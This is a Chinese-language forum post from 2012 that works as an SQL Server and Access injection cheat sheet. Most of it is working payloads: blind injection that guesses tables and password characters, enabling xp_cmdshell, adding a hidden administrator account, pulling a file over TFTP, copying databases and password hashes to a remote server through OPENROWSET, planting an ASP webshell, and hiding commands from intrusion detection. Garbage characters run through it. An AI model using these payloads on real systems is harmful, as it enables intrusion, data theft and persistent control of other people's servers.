1..判断有无注入点 % }3 i" [) T- V( c
; and 1=1 and 1=2
: M9 [' s; H$ L3 I" u7 K) ~; @$ V6 \) U1 n# P- Q
4 ~8 _6 m4 C; |7 e
2.猜表一般的表的名称无非是admin adminuser user pass password 等.. & f7 @: p$ \& p! B* W* W/ u1 {
and 0<>(select count(*) from *) ( f$ {( A4 r8 c
and 0<>(select count(*) from admin) ---判断是否存在admin这张表
+ t/ a5 b) ?5 Q" ~8 D7 V7 W. @! z1 q0 |+ A5 j
) s. r* `1 D, L! p% a
3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
0 t9 `. q1 D* I4 ?3 |: \' Qand 0<(select count(*) from admin) # P4 m4 Q o1 N2 a. ^1 [: L4 {2 Y
and 1<(select count(*) from admin) # ~& t2 r3 ?2 H+ O4 A3 |( X
猜列名还有 and (select count(列名) from 表名)>0
/ p7 f8 F$ z/ P+ x3 Z4 o
7 J) `# _1 s# k6 c; @5 E! B! C4 {% ~
4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称. N5 ^% ~1 k/ H9 {
and 1=(select count(*) from admin where len(*)>0)-- 6 p9 f3 T* C" M9 F4 r3 \& W
and 1=(select count(*) from admin where len(用户字段名称name)>0)
/ s/ F1 }- n9 G5 c1 j+ @and 1=(select count(*) from admin where len(密码字段名称password)>0) - H& Y1 t7 j, \
6 Z, i+ I9 D" m" L$ Z8 S6 ?; O5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止 9 a' q1 @8 y* y7 S; `
and 1=(select count(*) from admin where len(*)>0) l' G# g2 p" p+ P5 E
and 1=(select count(*) from admin where len(name)>6) 错误
E/ _4 k5 q) I! Kand 1=(select count(*) from admin where len(name)>5) 正确 长度是6 $ B9 w2 n( x( R0 w6 W4 T% Z
and 1=(select count(*) from admin where len(name)=6) 正确 9 I; f* o, y+ O1 K& j- _
0 Y7 i) a* g$ [( c7 u4 l# [! h
and 1=(select count(*) from admin where len(password)>11) 正确 - T, x! S( X4 [* ]- T
and 1=(select count(*) from admin where len(password)>12) 错误 长度是12 * |6 S- U, u. W* y, |# l7 E" x
and 1=(select count(*) from admin where len(password)=12) 正确
! f! Y0 v2 F* `5 J# O! |/ M猜长度还有 and (select top 1 len(username) from admin)>5( T5 f+ l3 f: h# G* P& a
/ h' H, w; ?6 a! C2 E0 G6 d
+ z+ z. o+ l: V& U e6 v# h6 [+ [: k6.猜解字符 ; ]# C0 u6 Y1 t
and 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
- N1 |1 ~! z" q2 o/ ?and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位 , \2 y+ ^4 @; C. o, }% N
就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了 0 I" N& X3 z) l' s
* W& C; @5 ~3 b6 o c( A* m猜内容还有 and (select top 1 asc(mid(password,1,1)) from admin)>50 用ASC码算5 ]* [8 C* R* N1 z, b! _0 h$ h
and 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
$ c' F" o+ X1 P& C这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.
# d1 F$ Y# l& \5 @+ |- u! z0 Z, \3 m. c! s+ J! \$ Q3 h
group by users.id having 1=1--
' C6 }, P- N8 d& O+ s: wgroup by users.id, users.username, users.password, users.privs having 1=1--
) Y6 [+ N6 T, U: O1 X$ ?: e3 c; insert into users values( 666, attacker, foobar, 0xffff )--
. n2 p7 D: ~8 c4 ]" I# x M
3 d" i( }5 l6 Y$ i0 r8 ~UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable- : n1 ?" m( ~# i0 E; q3 }
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)-
7 G! T4 j: H( vUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)- # R; X6 v# c+ I% x# g3 }
UNION SELECT TOP 1 login_name FROM logintable-
- V: |! A) m. RUNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
V- ? y2 _) ^+ F( N& S) I* A2 i7 o3 O5 r
* Z1 O9 }$ f: Y4 a F; e看服务器打的补丁=出错了打了SP4补丁 # D9 P' |) `7 I: E5 A/ Q2 ~7 m
and 1=(select @@VERSION)-- % H( B8 E6 [) c3 D7 {
! J2 b& _4 _1 j0 _, l1 o8 e: E看数据库连接账号的权限,返回正常,证明是服务器角色sysadmin权限。 / F1 M6 ?/ A0 b1 k, P: _5 h( y
and 1=(SELECT IS_SRVROLEMEMBER(sysadmin))-- 5 z& l- T, o: ?3 o' E t
2 ~1 @/ R5 `7 V, ~& p" e判断连接数据库帐号。(采用SA账号连接 返回正常=证明了连接账号是SA) & ~2 ^+ v& w# t. o8 K
and sa=(SELECT System_user)-- 0 @- C+ O8 p* |/ V0 n' p7 Z0 b
and user_name()=dbo-- $ [% Z9 ]0 V C: y( ^, Q- V! O* e
and 0<>(select user_name()--
! _ @0 v( ]# u0 o: A2 J6 ?2 \7 ^: H: z1 U% i" `
看xp_cmdshell是否删除 / u2 g, b+ j! ? o/ h! k
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)-- # b* N& T, v$ N
* A& U# ?! ? d" m
xp_cmdshell被删除,恢复,支持绝对路径的恢复
3 G @2 z/ X6 |) a" T;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
1 X! O! ~; u" o) @;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll-- $ m' O; |, q' L6 y% D8 A. Z; r
- X! B3 e3 @6 I' k) ]4 a+ b
反向PING自己实验
3 G! M4 y4 B& a3 E/ { t! p;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";-- 5 o" J% i8 X; E( U, R
) m* s$ I- r0 x$ p1 F8 d6 [, V
加帐号
: x: R* U1 n/ h, o' L: G- Z* {;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
X% K$ y5 c0 `4 O* f
t. ]6 t/ B( _( \创建一个虚拟目录E盘: ' B! l |# R u u; b
;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e:\"--
" n# B- d+ C- k) r
5 v- R) D! V/ n& w访问属性:(配合写入一个webshell) # C- O* e5 ]2 S; r) d! j: @7 S! z9 b7 J
declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c:\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse 7 G( ^$ W/ `7 p8 ^3 U' ?3 v
' L: ]$ k5 G, p* x- l
3 e% b/ i0 }0 \. lMSSQL也可以用联合查询+ M K, _% b# h! c0 q
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin $ j" |+ U8 m/ j- _7 D! ^" Y
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union,access也好用)
; n- U8 C! u" S& p: ?3 i8 J. G
8 g# l/ {$ L+ g) V5 s
爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交
7 P# ]% v7 H) m9 v* V& X2 O4 a5 Z* U8 K
! c I8 p$ F1 C- t y1 H
8 V# W; j) p4 @) Z. L h i, j得到WEB路径 5 X. F+ C9 r0 [
;create table [dbo].[swap] ([swappass][char](255));--
; ^3 x$ u3 K0 [2 {" Pand (select top 1 swappass from swap)=1-- * s% @6 W. k' _7 S8 g" d+ J0 d
;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
* z+ e4 U9 x8 @- V2 ];use ku1;-- $ L; Q' B) n) m
;create table cmd (str image);-- 建立image类型的表cmd ' p' M4 o2 p; l; I5 ?4 v" m0 k
. h' g2 H' k( N$ D存在xp_cmdshell的测试过程:
) _6 W- @# R0 W6 Z! Y;exec master..xp_cmdshell dir
7 M. U/ @% f7 ?- v0 I% r8 i;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
1 N3 A( T6 y$ h& ~( u+ w9 E;exec master.dbo.sp_password null,jiaoniang$,1866574;--
. {+ @8 h, J) R4 f+ ?( ^$ X) L;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;-- 1 c1 L3 d! O) g+ P0 r' U0 A
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;-- * O" h" R7 U9 x8 }
;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;-- 2 Q* O6 K7 K4 z* I; k
exec master..xp_servicecontrol start, schedule 启动服务
% Z+ s) ?% q, k1 Q# S9 I4 N v! eexec master..xp_servicecontrol start, server
8 w+ |' l) M$ S! v* f4 s1 r8 |: O; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
' y9 @1 I2 y' ^) ~;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
/ E: I3 t! w, }4 H8 `( }; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件 ) I9 h3 ]' m6 Q, G1 U- J
% Y% C; O! m8 i; R/ e- N$ @;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
, B6 v% a2 Q6 A" [5 a;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\ 8 J& z4 ]4 W- ~0 c2 X4 X
;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat 4 P f: g6 y: I) `% q% I' a
如果被限制则可以。 & p7 I- H8 v" h2 |2 y
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)
# t* J1 B- q& y; j2 s' @7 O# o9 \8 N# f0 b$ P# u% O+ W$ ~
查询构造: ( t: M* a4 b$ q: d" n" { r" l
SELECT * FROM news WHERE id=... AND topic=... AND ..... / U# m3 W, k& g i' J! k8 Z
adminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <> 2 m7 [7 ` ~5 N1 a
select 123;-- ' j6 v( v4 }* j B
;use master;--
( O4 f l+ M! R2 a% Y:a or name like fff%;-- 显示有一个叫ffff的用户哈。 * d5 e$ F) \& g3 o, \' E
and 1<>(select count(email) from [user]);--
8 U% _% ^& {' c! ^0 r }+ s: n;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;-- % w) B+ T z1 t) r# J A
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
( o: }4 {! W0 R: T5 |+ Y! `7 q;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;-- ; w, `6 f/ M6 z! b) ?2 v4 h& P$ `
;update [users] set email=(select top 1 count(id) from password) where name=ffff;-- ' z+ ^* P5 c3 o" S3 H
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;-- $ t) g; x9 L% I
;update [users] set email=(select top 1 name from password where id=2) where name=ffff;-- , q$ C; K$ o5 x6 D' o
上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。 , n0 O }4 X. L1 \- w; y
通过查看ffff的用户资料可得第一个用表叫ad . v: _2 i7 @, u* S! P
然后根据表名ad得到这个表的ID 得到第二个表的名字 ' Q& k+ f" A) d5 `4 I
9 }4 r3 e* Y3 q) M+ _7 ainsert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
; C V( G$ H( O: L& [! `3 M% r8 Hinsert into users values( 667,123,123,0xffff)--
, `; h3 a( H$ y6 |( D- i$ {: O0 g& }insert into users values ( 123, admin--, password, 0xffff)-- - R4 z1 n/ h6 C6 P; r/ Z
;and user>0 5 }% s7 w2 r3 r0 D; `
;and (select count(*) from sysobjects)>0 - O. B. u# S! N' b4 p. _3 r
;and (select count(*) from mysysobjects)>0 //为access数据库 - H. w$ J; Y5 F) j* {: o
: y9 P. G# u! I" |$ D
枚举出数据表名 : A& g7 `$ X/ p
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);-- ( Q ?- h- C: A" B6 Z, l. Y
这是将第一个表名更新到aaa的字段处。 / E8 G* I: F1 n
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>刚才得到的表名)。 3 y: E' y& }, h
;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--
- [ P# z+ g# H8 e8 u8 y然后id=1552 and exists(select * from aaa where aaa>5) : n4 W) J+ ]( P6 f
读出第二个表,一个个的读出,直到没有为止。
& Q- Z4 D8 B: q+ o& r+ d读字段是这样: : `# ?2 j2 U/ b! H
;update aaa set aaa=(select top 1 col_name(object_id(表名),1));-- $ ]/ O3 O1 h# O! ~/ ]! F
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名 : W; y& k' j& m/ X) n
;update aaa set aaa=(select top 1 col_name(object_id(表名),2));-- % Q* R& O. e9 r6 C& r! O+ T
然后id=152 and exists(select * from aaa where aaa>5)出错,得到字段名
, @7 I- d- v! _
/ V4 P% c w* r* s p[获得数据表名][将字段值更新为表名,再想法读出这个字段的值就可得到表名]
6 r9 }. d# \" I5 @update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
8 R7 _7 e7 u$ T% y* C% U通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]
7 o4 h( n# N6 r' ]' [, |; u1 W* `) ^& ^9 N8 C4 A
[获得数据表字段名][将字段值更新为字段名,再想法读出这个字段的值就可得到字段名] ( M1 u1 E4 X) r4 c2 _. B8 u
update 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件] 7 g$ n7 v6 ^# F! X5 Q5 ?/ H# `
+ q. `( H1 C3 D5 J- n+ S
绕过IDS的检测[使用变量] 9 U* { Z/ O: M5 O7 m# t& \
;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
% ~& I# `5 L$ K5 ]1 z;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\ % t: M% h$ I, W' {8 j+ B( r9 Z
$ Z# q7 U) }1 o1、 开启远程数据库 # I) k& J1 Z; g- V, r" m6 D
基本语法 3 f. v$ M6 ?9 Z+ A4 r3 m
select * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
+ ]- z, H o6 ~/ J$ y- _参数: (1) OLEDB Provider name
( l u/ T& R( R3 A0 g M9 t/ l5 @$ m2、 其中连接字符串参数可以是任何端口用来连接,比如 7 t4 p7 T6 A, H6 l7 F
select * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
! g7 Z. `; T) _# J3.复制目标主机的整个数据库insert所有远程表到本地表。 6 A7 A4 Y. H% n+ R
6 m; f) _; @0 E0 c
基本语法:
. d8 v7 u: ]2 p$ N) Xinsert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
' I" B5 o9 o$ v6 ?+ L. ^这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口,指向需要的地方,比如: , Y$ [3 N- S: a9 }
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2 # m' G0 g8 f# @( ~5 ~: H! E
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
5 M+ p- V) U0 \$ C' _- N, Mselect * from master.dbo.sysdatabases
" x* f* v5 Q7 u: q3 Y' I" hinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
5 }! D& z- e' L; Bselect * from user_database.dbo.sysobjects
5 b8 n: s* a4 r% dinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns) 1 z% F2 U. |$ [- b6 v
select * from user_database.dbo.syscolumns ) c) r. u c# a' t$ ^
复制数据库:
" c$ b1 r" a6 Z' M2 Ainsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1
8 g2 n! t$ U1 K# i9 `3 O! F/ v2 u# Binsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2 / |; R* D M$ M6 q5 Y. ` P( U
5 o. D. m |6 x" g复制哈西表(HASH)登录密码的hash存储于sysxlogins中。方法如下: - n' p' V5 N( ]7 J7 K/ W- [
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
2 W5 O! I% r, o( g/ d6 [得到hash之后,就可以进行暴力破解。 - z" `. p) Q& m6 ^) d( ?& _" t
! w% C, o/ T( D( e
遍历目录的方法: 先创建一个临时表:temp ; m0 s, }8 C7 P
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ( v7 S: l' i* g
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
# G" p7 f1 ^, f7 e3 \' S' r;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表 j' k! {/ r) F, v
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
3 e9 C8 [- }5 P, l! j;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
, m& P! C: v4 g7 B/ P5 w+ k;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;-- 0 ^: U }4 l: @
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;-- 6 k) Z" n9 L# ~8 d
;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc , N; C7 n+ y8 S$ ~. W( g* W
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- (xp_dirtree适用权限PUBLIC)
" B5 M2 C# a9 D* D) M2 g' Y) j, `8 T7 E写入表: 4 Q8 _; @5 B" q
语句1:and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));-- 7 j: k; X! u8 M: I0 a8 w. R* E
语句2:and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));-- 9 P0 l2 p9 [, {8 o: g2 E
语句3:and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));-- 4 d2 F' i" M6 o/ c4 W
语句4:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- , Y6 c5 B1 N/ ^5 ?, X. r N* Z" f0 M
语句5:and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));-- & P; Y0 p2 c! V" k$ i
语句6:and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));-- - I# \/ L& J# w
语句7:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- + I$ W1 j E2 j8 w( W
语句8:and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));-- 3 a6 {+ M' n) C, o% C
语句9:and 1=(SELECT IS_MEMBER(db_owner));-- & @5 ]" ? e7 y' p( A( e5 g% ]
+ i( d) S1 Q$ s0 \& m把路径写到表中去:
0 [8 R4 \$ T8 P;create table dirs(paths varchar(100), id int)--
# [2 ?! D( r, K4 D# G6 ^;insert dirs exec master.dbo.xp_dirtree c:\-- / P' ]' s+ w3 I2 f
and 0<>(select top 1 paths from dirs)--
- f* \1 Q: c( L+ Q Rand 0<>(select top 1 paths from dirs where paths not in(@Inetpub))-- * P3 Y1 Q2 k. m5 F$ y) Q4 l& D7 {
;create table dirs1(paths varchar(100), id int)-- + @5 a' v' t9 ~) A# b1 T9 U
;insert dirs exec master.dbo.xp_dirtree e:\web--
( G2 O4 u9 h, A0 W, T fand 0<>(select top 1 paths from dirs1)--
7 c8 ^+ P$ H2 n7 p. s! \% A
/ c7 G$ ]. q. d0 d7 M把数据库备份到网页目录:下载
( Q: h' D' F# r ^: [" W, U1 w;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;-- % S; E, f+ ?: J" d: C5 z V3 @
t) O0 O) f' o$ u% F k- @and 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc) 1 A# T6 P6 n x) m$ H) T& x
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。
5 y- w7 u& V% b4 Q" Q, s7 rand 1=(select user_id from USER_LOGIN) 2 q, u8 V% y& j
and 0=(select user from USER_LOGIN where user>1) 3 c5 F1 I2 V, r2 _/ f+ v& b
2 a5 H/ E: A4 G-=- wscript.shell example -=-
' `7 U; ], s! T+ c$ Sdeclare @o int 0 h0 J& |! j) [! a }6 }" f
exec sp_oacreate wscript.shell, @o out
/ j9 ~% P8 O! c% fexec sp_oamethod @o, run, NULL, notepad.exe
( X+ H! b+ F. B9 s$ v6 M. c; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--
8 M) L6 p H# Z8 j1 T$ q, G: L
5 _: O# I' x& {( \8 F6 Odeclare @o int, @f int, @t int, @ret int
3 {# G( [& s% Y# t" d9 Ddeclare @line varchar(8000)
( J: q) n) F% ?) D4 kexec sp_oacreate scripting.filesystemobject, @o out
! D' C% C, x( l9 h5 W Rexec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
# f3 h3 e& L. u5 ?exec @ret = sp_oamethod @f, readline, @line out
+ ^5 H- u: @0 kwhile( @ret = 0 ) 4 A" ]6 F7 k1 H0 E
begin % |# ~$ ^5 h0 {
print @line 5 |0 H' r: x3 A( N
exec @ret = sp_oamethod @f, readline, @line out 7 {' h- d9 u$ m( J; j6 B9 _
end ( O4 \: x) O$ E) a! b0 b& P; C
% q5 p5 v0 u- y) ideclare @o int, @f int, @t int, @ret int
8 P* X# a% ^9 W% v0 gexec sp_oacreate scripting.filesystemobject, @o out
9 a7 \/ X, Q) t0 T9 ?exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
3 V+ D5 {! J* ^exec @ret = sp_oamethod @f, writeline, NULL,
. f; C) i! D3 u' R7 p( K<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>
! Z% S$ p' ?9 n& ]% _8 L, {6 n! Y: s* L2 ^0 ~ `9 }6 V
declare @o int, @ret int ( x4 b- U" s+ F: i8 J2 J3 h [5 c- @4 u
exec sp_oacreate speech.voicetext, @o out
6 P+ y+ a$ C' Y: q+ i* ?; Wexec sp_oamethod @o, register, NULL, foo, bar ( k1 Y4 M Y. N E9 I$ V
exec sp_oasetproperty @o, speed, 150
6 s2 h+ T8 c" m V- c& o5 ?9 V! qexec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528 K( N C- c. ^1 i j+ j7 i
waitfor delay 00:00:05
& j& N/ n3 b% \4 Y9 }8 U6 n' w, g$ ~" A+ f- o; A/ u5 C
; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05-- ( b5 g) p8 F( ?/ p8 u9 N
$ N. r/ X4 F0 d
xp_dirtree适用权限PUBLIC 7 R4 u' y8 @( w
exec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型,depth字段是整形字段。 1 _) ^+ `0 A' ?8 w& r) J$ B0 G
create table dirs(paths varchar(100), id int)
1 H: L1 N+ P( x, T建表,这里建的表是和上面xp_dirtree相关连,字段相等、类型相同。 0 @$ J! U7 d4 A- T7 o0 [
insert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行!达到写表的效果,一步步达到我们想要的信息!4 W1 v* o2 d. M: z+ G
|
发表于 2012-9-15 14:32:40
收藏
支持
反对